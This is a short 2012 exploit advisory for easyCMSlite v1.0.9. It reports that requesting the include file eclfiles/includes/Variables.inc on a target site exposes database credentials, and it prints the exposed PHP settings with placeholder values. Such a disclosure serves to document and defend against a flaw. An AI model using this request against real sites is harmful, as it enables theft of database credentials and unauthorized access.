##################################################################################### # Exploit Title: easyCMSlite v.1.0.9 - Database Information Disclosure # Google Dork: - # Date: 7/2012 # Author: mr.pr0n (@_pr0n_) # Homepage: http://ghostinthelab.wordpress.com/ # Software Link: http://www.easycmslite.com/ # Version: v.1.0.9 # Tested on: Windows / Linux ##################################################################################### =============== Description =============== easyCMSlite is a free, easy content management system (CMS). We are actively growing our number of templates to choose from with more on the way (this site uses easyCMSlite, so you're looking at a template right now!). Take a look at the new CMS templates that are in progress. If you have no or little experience, time or budget but need to get a site up quickly and easily, then try out easyCMSlite, the free, easy content management system (setting up this entire CMS website took about 1 hour!). ================================================== 0x01. Database Information Disclosure. ================================================== [+] http://TARGET/eclfiles/includes/Variables.inc ----------------------------------------------------------------- <? // Database settings $DatabaseServerAddress = "localhost"; $DatabaseName = "Database Name"; $DatabaseUserName = "Database Username"; $DatabasePassword = "Database Password"; ?> ----------------------------------------------------------------- -- mr.pr0n (@_pr0n_) http://ghostinthelab.wordpress.com